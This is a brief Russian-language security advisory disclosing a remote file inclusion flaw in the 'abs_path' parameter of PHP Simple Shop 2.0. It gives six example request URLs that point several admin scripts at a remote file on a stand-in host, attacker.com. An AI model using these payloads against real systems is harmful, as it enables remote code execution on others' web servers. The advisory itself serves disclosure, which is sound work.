Программа: PHP Simple Shop 2.0, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "abs_path" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

ПрПример:

http://victim/[phpsimpleshop_path]/admin/index.php?abs_path= http://attacker.com/inject.txt?
http://victim/[phpsimpleshop_path]/admin/adminindex.php?abs_path= http://attacker.com/inject.txt?
http://victim/[phpsimpleshop_path]/admin/adminglobal.php?abs_path= http://attacker.com/inject.txt?
http://victim/[phpsimpleshop_path]/admin/login.php?abs_path= http://attacker.com/inject.txt?
http://victim/[phpsimpleshop_path]/admin/menu.php?abs_path= http://attacker.com/inject.txt?
http://victim/[phpsimpleshop_path]/admin/header.php?abs_path= http://attacker.com/inject.txt?



Оставить мнение